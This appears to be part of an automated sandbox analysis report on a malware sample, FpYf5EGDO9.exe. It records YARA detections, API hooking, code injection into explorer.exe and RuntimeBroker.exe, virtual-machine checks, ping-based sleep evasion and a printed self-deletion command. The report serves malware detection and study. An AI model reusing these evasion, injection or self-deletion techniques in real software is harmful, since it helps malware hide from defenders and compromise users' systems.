Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Self deletion via cmd delete

Show sources

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296

Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5548
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4162

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i1aaekli.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWPw#
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000027.00000000.663110926.000002DE46A40000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.491335244.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: FpYf5EGDO9.exe, 00000000.00000002.510522869.000000000222F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_021BC1C2 push dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: lycos.com
Source: C:\Windows\explorer.exe	Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe	Domain query: www.lycos.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1B888A50000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27740170000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 35D0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AE0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 93C000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: D70000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1B888A50000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057A000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E30000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290AE000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D2F18CF000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27740170000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 35D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
